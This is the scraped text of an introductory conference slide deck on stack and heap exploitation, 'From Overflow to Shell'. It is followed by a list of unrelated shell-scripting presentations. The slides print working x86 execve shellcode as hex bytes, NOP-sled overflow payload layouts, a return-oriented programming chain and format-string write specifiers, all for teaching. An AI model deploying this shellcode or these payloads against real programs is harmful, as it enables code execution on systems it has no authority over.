from over ow to shell from over ow to shell
play

From Overow to Shell From Overow to Shell An Introduction to - PowerPoint PPT Presentation

Mar 15, 2024 •331 likes •619 views

From Overow to Shell From Overow to Shell An Introduction to low-level exploitation An Introduction to low-level exploitation Carl Svensson @ Foo Caf, February 2019 Carl Svensson @ Foo Caf, February 2019 1 / 28 1 / 28 Background

  1. From Over�ow to Shell From Over�ow to Shell An Introduction to low-level exploitation An Introduction to low-level exploitation Carl Svensson @ Foo Café, February 2019 Carl Svensson @ Foo Café, February 2019 1 / 28 1 / 28

  2. Background Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com Twitter: @zetatwo 2 / 28

  3. Background Agenda 1. Background 2. Stack based exploitation 3. Protections and bypasses 4. Heap based explotation 5. Next steps 3 / 28

  4. Background Who are you? Programmer Security interested Low-level language C, C++ Basic OS 4 / 28

  5. Background What is an exploit? Unintended behaviour State machine Initial state Reachable state Invalid state Exploit Invalid state "Dangerous" subset Vulnerability Unintended transition (bug) Leading to an exploit 5 / 28

  6. Background A note on data Bits, groups of bits nibble, byte, word, dword, qword Integer, text, code, addresses 65 66 67 68, "ABCD", inc ecx; inc edx; inc ebx; inc esp, 0x44434241 Same data, different operation Context Endianess, little vs big Little: 0x44332211 = 0x11 0x22 0x33 0x44 Big: 0x44332211 = 0x44 0x33 0x22 0x11 6 / 28

  7. Background Where are we? Physics Circuits Machine code <-- You are here Assembler Low-level code: C, Rust Mid-level code: Java, C# High-level code: Python, JS 7 / 28

  8. Background x86 architecture 101 x86 basics Virtual memory Stack, heap, code 8 / 28

  9. Background x86 architecture 101 x86 basics Virtual memory Stack, heap, code General purpose EAX, EBX, ECX, EDX Special purpose EIP, EBP, ESP 9 / 28

  10. Background Calling convention x86 basics Architecture specific x86, 32 bit 0xDEADBEEF eip+5 ... 0xDEADBEEF eip args in reverse order f(a,b) push push call f base pointer 10 / 28

  11. Background Calling convention x86 basics Architecture specific x86, 32 bit call 0xDEADBEEF = push eip; jmp 0xDEADBEEF ret = pop eip args in reverse order base pointer 11 / 28

  12. Background Stack bu�er over�ow x86 basics Unchecked write Overwrite adjacent memory Stack Exploitation Overwrite return address () { local1; buf[16]; fgets(buf); } [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][ address (4 bytes)] [AAAABBBBCCCCDDDD][EEEE][FFFF][GGGG]\0... Program received signal SIGSEGV, Segmentation fault. 0x47474747 example1 () 12 / 28

  13. Background Shellcode x86 basics Code that launches a shell One of the general goals Stack Exploitation %eax,%eax %eax $0x68732f2f ; "//sh" $0x6e69622f ; "/bin", "/bin//sh" mov %esp,%ebx %eax %ebx mov %esp,%ecx mov $0xb,%al ; execve $0x80 ; "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 13 / 28

  14. Background Stack bu�er over�ow (-96) x86 basics Unchecked write Overwrite adjacent memory Stack Exploitation Overwrite return address With shellcode address () { local1; buf[16]; fgets(buf); } [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][ address (4 bytes)] 0xbffffdb4: [31C050682F2F7368682F62696E89E350][5389E1B0][0BCD8000][0xbffffdb4]\0... $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 14 / 28

  15. Background Shellcode placement x86 basics Shellcode can be placed anywhere Stack Exploitation () { local1; buf[12]; fgets(buf); } [buf (12 bytes)][local1 (4 bytes)][saved bp (4 bytes)][ address (4 bytes)] 0xbffffdb4: [AAAABBBBCCCCDDDD][EEEE][FFFF][0xbffffdd0]31C050682F2F7368682F62696E89E3505389E1B00BCD8000 $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 15 / 28

  16. Background Shellcode placement x86 basics Shellcode can be placed anywhere Don't need exact location Stack Exploitation NOP creates margin nop = 0x90 () { local1; buf[12]; fgets(buf); } [buf (12 bytes)][local1 (4 bytes)][saved bp (4 bytes)][ address (4 bytes)] 0xbffffdb4: [AAAABBBBCCCCDDDD][EEEE][FFFF][0xbffffdd0] 90909090909090909031C050682F2F7368682F62696E89E3505389E1B00BCD8000 $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 16 / 28

  17. Background Protection: ASLR (-01) x86 basics Base of stack random Code still static Stack Exploitation Location unkown Gadget 0x4000104A: esp [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][ address (4 bytes)] 0x????????: [31C050682F2F7368682F62696E89E350][5389E1B0][0BCD8000][0x4000104A] $ uname -a Linux pwnbox 4.15.0-42-generic #45-Ubuntu... 17 / 28

  18. Background Protection: NX/DEP (-97) x86 basics Random stack, static code Stack not executable, unkown location Stack Exploitation Gadgets Return-oriented programming 0x4000104A: 0x4000106A: ... ... eax ebx ecx [buf (16 bytes)][local1 (4 bytes)][saved bp (4 bytes)][ address (4 bytes)] 0x????????: [AAAA...DDDD][EEEE][FFFF][0x4000104A][0xDEADBEEF][0x4000106A][0xCAFEBABE][0xFEEDF00D] eax = 0xDEADBEEF ebx = 0xCAFEBABE ecx = 0xFEEDF00D 18 / 28

  19. Background Protection: StackGuard (-98) x86 basics Prevent the overflow Canary, secret value Stack Exploitation Controlled crash () { () { push_stack_cookie(); // Compiler local1; local1; buf[12]; buf[12]; fgets(buf); } fgets(buf); check_stack_cookie(); // Compiler } SECRET = 0xfe481ac9 [buf (16 bytes)][local1 (4 bytes)][SECRET][saved bp (4 bytes)][ret address (4 bytes)] [AAAA...DDDD][EEEE][FFFF][GGGG][0x4000104A] 0x464646466 != 0xfe481ac9 : ./a.out terminated ======= Backtrace: ========= /lib/i386-linux-gnu/libc-2.27.so (__fortify_fail+0x48) Aborted* 19 / 28

  20. Background Other topics x86 basics Format string vulnerability GOT, PLT Stack Exploitation Protection: RELRO EBP overwrite Create a new fake stack Partial overwrites 0x44434241 = 0x41 0x42 0x43 0x44 0xFF 0x42 0x43 0x44 = 0x444342FF Protection: Control-flow integrity (2014) Bypass: JIT Protection: PAC (2017) Bypass: TBA 20 / 28

  21. Background Format string vulnerability x86 basics int printf ( char * format, ... ); Stack Exploitation printf("Name: %s, age: %d", name, age); // Ok printf(name); // Vulnerable Variable number of arguments Controlled by format string EBP+4*(i+1) Read direct: %x Read indirect: %s Write: %n Copy: %0*x Skip: %4$08x 21 / 28

  22. Background Base pointer overwrite x86 basics Fake stack Control local variables Stack Exploitation Absolute overwrite Partial overwrite 22 / 28

  23. Background Other topics x86 basics Format string vulnerability GOT, PLT Stack Exploitation Protection: RELRO EBP overwrite Create a new fake stack Partial overwrites 0x44434241 = 0x41 0x42 0x43 0x44 0xFF 0x42 0x43 0x44 = 0x444342FF Protection: Control-flow integrity (2014) Bypass: JIT Protection: PAC (2017) Bypass: TBA 23 / 28

  24. Background A refresher on memory x86 basics Physical Virtual Stack Exploitation Pages Memory allocator libc (malloc/free) Heap exploitation other custom 24 / 28

  25. Background Heap corruption: application layer x86 basics Heap overflow Use after free Stack Exploitation Type confusion Heap exploitation 25 / 28

  26. Background Heap corruption: memory allocator x86 basics Re-linking Double free Stack Exploitation Heap exploitation 26 / 28

  27. Background Want try it out? x86 basics Capture the Flag, CTF https://ctftime.org Stack Exploitation https://capturetheflag.withgoogle.com Wargames https://picoctf.com Heap exploitation http://pwnable.kr https://overthewire.org YouTube Next steps LiveOverflow Gynvael Coldwind MurmusCTF ZetaTwo Tools python + pwntools gdb + pwndbg radare2, IDA, binary ninja Educational https://github.com/RPISEC/MBE https://github.com/shellphish/how2heap 27 / 28

  28. Questions? Questions? 28 / 28 28 / 28

Recommend

What is Bash Shell Scripting? A shell script is a script written for the shell, or command

What is Bash Shell Scripting? A shell script is a script written for the shell, or command

What is Bash Shell Scripting? A shell script is a script written for the shell, or command line interpreter, of an operating system. The shell is often considered a simple domain-specific programming language . Typical operations

802 views • 15 slides
Bourne (Again) Shell CIS 218 Bourne Again Shell Current GNU LINUX BASH Shell documentation:

Bourne (Again) Shell CIS 218 Bourne Again Shell Current GNU LINUX BASH Shell documentation:

Bourne (Again) Shell CIS 218 Bourne Again Shell Current GNU LINUX BASH Shell documentation: http://www.gnu.org/software/bash/manual/bashref.html Bash is an acronym for Bourne - Again SHell. The Bourne shell is the traditional

947 views • 37 slides
More Linux Shell Scripts Fundamentals of Computer Science Outline Shells and Shell

More Linux Shell Scripts Fundamentals of Computer Science Outline Shells and Shell

More Linux Shell Scripts Fundamentals of Computer Science Outline Shells and Shell Scripts Shell Variables and the Environment Simple Shell Scripting More Advanced Shell Scripting Start-up Shell Scripts Shells and Shell

367 views • 17 slides
CSCE 625: Artificial Intelligence Dr. Dylan Shell 1 Shell CSCE 625 TAMU 2 Shell CSCE 625 TAMU

CSCE 625: Artificial Intelligence Dr. Dylan Shell 1 Shell CSCE 625 TAMU 2 Shell CSCE 625 TAMU

Shell CSCE 625 TAMU CSCE 625: Artificial Intelligence Dr. Dylan Shell 1 Shell CSCE 625 TAMU 2 Shell CSCE 625 TAMU 3 Shell CSCE 625 TAMU 4 Shell CSCE 625 TAMU Pay attention to this: https://www.youtube.com/watch?v=vJG698U2Mvo 5 Shell

352 views • 8 slides
Bash shell SE 2XA3 Term I, 2020/21 Outline Shells Shell scripts Shell variables Command-line

Bash shell SE 2XA3 Term I, 2020/21 Outline Shells Shell scripts Shell variables Command-line

Bash shell SE 2XA3 Term I, 2020/21 Outline Shells Shell scripts Shell variables Command-line arguments For loops Conditionals Shell customization Environment variables Aliases Shells A Unix shell is a command-line interpreter

475 views • 18 slides
Introduction to Shell Programming what is shell programming? about cygwin review of

Introduction to Shell Programming what is shell programming? about cygwin review of

Introduction to Shell Programming what is shell programming? about cygwin review of basic UNIX TM pipelines of commands about shell scripts some new commands variables parameters and shift command substitution

515 views • 35 slides
Bourne Shell Programming Topics Covered Shell variables Using options using getopts

Bourne Shell Programming Topics Covered Shell variables Using options using getopts

Bourne Shell Programming Topics Covered Shell variables Using options using getopts Using Quotes Reading Data Arithmetic On Shell Environment and subshells Passing Arguments Parameter substitution

826 views • 65 slides
Operating System API Case study: UNIX shell Unix shell Provides interactive command execution

Operating System API Case study: UNIX shell Unix shell Provides interactive command execution

Operating System API Case study: UNIX shell Unix shell Provides interactive command execution Was part of OS kernel initially, now a normal program The shell interface looks like this: $ _ Prompt Keyboard cursor Unix shell $ cat

474 views • 22 slides
Shell scripting with Haskell Franz Thoma Berlin, 2017-02-24 Overview Shell scripting with

Shell scripting with Haskell Franz Thoma Berlin, 2017-02-24 Overview Shell scripting with

Shell scripting with Haskell Franz Thoma Berlin, 2017-02-24 Overview Shell scripting with high-level languages The turtle library Scripts &amp; Dependency Management Parsing command line options A small application Conclusion Shell

537 views • 27 slides
Mehdi Azarmi Your default shell? (Bash or Tcsh) %echo $SHELL You may change your

Mehdi Azarmi Your default shell? (Bash or Tcsh) %echo $SHELL You may change your

Mehdi Azarmi Your default shell? (Bash or Tcsh) %echo $SHELL You may change your default shell %chsh USERNAME /bin/bash More in the CS help page http://www.cs.purdue.edu/resources/facilities/oracle/cs.sxhtml Note te :

92 views • 5 slides
The Shell What does a shell do? - execute commands, programs - but how? For built in commands

The Shell What does a shell do? - execute commands, programs - but how? For built in commands

The Shell What does a shell do? - execute commands, programs - but how? For built in commands run some code to do the command For other commands find program executable and .... run it. Other features: wildcards, pipes, redirection.

468 views • 18 slides
Introduction of Linux , oslab2020@163.com PART II Shell Script Compile

Introduction of Linux , oslab2020@163.com PART II Shell Script Compile

Introduction of Linux , oslab2020@163.com PART II Shell Script Compile &amp; Debug (for C) Text Editor (Vim, Sublime text, Atom) Shell Script A shell script is a program designed to be run by the shell. The various

375 views • 35 slides
The Command Shell Fundamentals of Computer Science Outline Starting the Command Shell

The Command Shell Fundamentals of Computer Science Outline Starting the Command Shell

The Command Shell Fundamentals of Computer Science Outline Starting the Command Shell Locally Remote Host Directory Structure Moving around the directories Displaying File Contents Compiling and Running a Python Program

198 views • 19 slides
REPRESENTING THE UNIVERSITY OF JOHANNESBURG AT THE SHELL ECO-MARATHON CONTENTS 01 The Shell

REPRESENTING THE UNIVERSITY OF JOHANNESBURG AT THE SHELL ECO-MARATHON CONTENTS 01 The Shell

REPRESENTING THE UNIVERSITY OF JOHANNESBURG AT THE SHELL ECO-MARATHON CONTENTS 01 The Shell Eco-marathon 02 Introduction 03 Technical Aspects 04 Technical Budget 05 Sponsorships 06 Multi-Disciplinary Team 07 Off Track Awards 08 Exposure

234 views • 20 slides
The devil shell (dsh) COMPSCI210 Recitation 4th Feb 2013 Vamsi Thummala Shell Interactive

The devil shell (dsh) COMPSCI210 Recitation 4th Feb 2013 Vamsi Thummala Shell Interactive

The devil shell (dsh) COMPSCI210 Recitation 4th Feb 2013 Vamsi Thummala Shell Interactive command interpreter A high level language (scripting) Interface to the OS Provides support for key OS ideas Isolation Concurrency

522 views • 22 slides
Annual General Meeting 2016 Royal Dutch Shell plc May 24, 2016 Royal Dutch Shell | May 24, 2016

Annual General Meeting 2016 Royal Dutch Shell plc May 24, 2016 Royal Dutch Shell | May 24, 2016

Annual General Meeting 2016 Royal Dutch Shell plc May 24, 2016 Royal Dutch Shell | May 24, 2016 Chad Holliday Chairman Royal Dutch Shell plc Royal Dutch Shell | May 24, 2016 Definitions &amp; The New Lens Scenarios are part of an ongoing

197 views • 19 slides
C Shell CIS 218 C Shell overview Csh (new version tchs) is a command language interpreter

C Shell CIS 218 C Shell overview Csh (new version tchs) is a command language interpreter

C Shell CIS 218 C Shell overview Csh (new version tchs) is a command language interpreter developed under BSD UNIX. It incorporates features of other shells and a history mechanism. Tcsh development is currently maintained by tcsh.org.

737 views • 25 slides
ROYAL DUT ROYAL DUTCH CH SHELL SHELL P PLC FIRS RST QU QUART ARTER 20 ER 2020 20 RES

ROYAL DUT ROYAL DUTCH CH SHELL SHELL P PLC FIRS RST QU QUART ARTER 20 ER 2020 20 RES

ROYAL DUT ROYAL DUTCH CH SHELL SHELL P PLC FIRS RST QU QUART ARTER 20 ER 2020 20 RES RESULTS APRIL 30 th 2020 FIRST QUARTER 2020 RESULTS WEBCAST TO MEDIA AND ANALYSTS BY BEN VAN BEURDEN, CHIEF EXECUTIVE OFFICER OF ROYAL DUTCH SHELL PLC

144 views • 11 slides
CSCE 625: Artificial Intelligence Dr. Dylan Shell 1 Shell CSCE 625 TAMU Charles Sanders Peirce:

CSCE 625: Artificial Intelligence Dr. Dylan Shell 1 Shell CSCE 625 TAMU Charles Sanders Peirce:

Shell CSCE 625 TAMU CSCE 625: Artificial Intelligence Dr. Dylan Shell 1 Shell CSCE 625 TAMU Charles Sanders Peirce: &quot;Looking out my window this lovely spring morning, I see an azalea in full bloom. No, no! I don't see that; though that

287 views • 9 slides
Unix -Lecture 7 Introduction to Shell Scripts What they are, creating them, running them,

Unix -Lecture 7 Introduction to Shell Scripts What they are, creating them, running them,

Unix -Lecture 7 Introduction to Shell Scripts What they are, creating them, running them, constructs, variables. COP 3363 Introduction to Programming * What is a shell script? A text file made executable! Contains: Unix shell commands

283 views • 12 slides
Shell Knew and Took the Future #ShellKnew #Takethefuture Etete and Abacha had abused their

Shell Knew and Took the Future #ShellKnew #Takethefuture Etete and Abacha had abused their

Shell Knew and Took the Future #ShellKnew #Takethefuture Etete and Abacha had abused their positions in the past, while in office, to award themselves the OPL 245 at a ridiculously low price Shell statement 21 May 2012 Shell was not

314 views • 18 slides
CIS 118 Intro to UNIX Bourne Again Shell (BASH) CIS 118: Intro to UNIX Shell

CIS 118 Intro to UNIX Bourne Again Shell (BASH) CIS 118: Intro to UNIX Shell

CIS 118 Intro to UNIX Bourne Again Shell (BASH) CIS 118: Intro to UNIX Shell Characteristics Command-line interface between the user and the system Automatically starts when you log in, waits for user to type in commands A

380 views • 19 slides
Mo Most staf afa a Z. Ali Z. Ali mzali@just.edu.jo 1-1 The Bourne Again Shell The

Mo Most staf afa a Z. Ali Z. Ali mzali@just.edu.jo 1-1 The Bourne Again Shell The

Fall 2009 Lecture 9 Operating Systems: Configuration &amp; Use CIS345 T HE B OURNE A GAIN S HELL Mo Most staf afa a Z. Ali Z. Ali mzali@just.edu.jo 1-1 The Bourne Again Shell The Bourne Again Shell is a command interpreter and high-

1.59k views • 134 slides
STAT 605 Data Science Computing Introduction to Shell Scripting Basic concepts Shell : the

STAT 605 Data Science Computing Introduction to Shell Scripting Basic concepts Shell : the

STAT 605 Data Science Computing Introduction to Shell Scripting Basic concepts Shell : the program through which you interact with the computer. Reads, parses and executes the commands typed into the terminal Popular shells: bash (Bourne Again

905 views • 52 slides

More recommend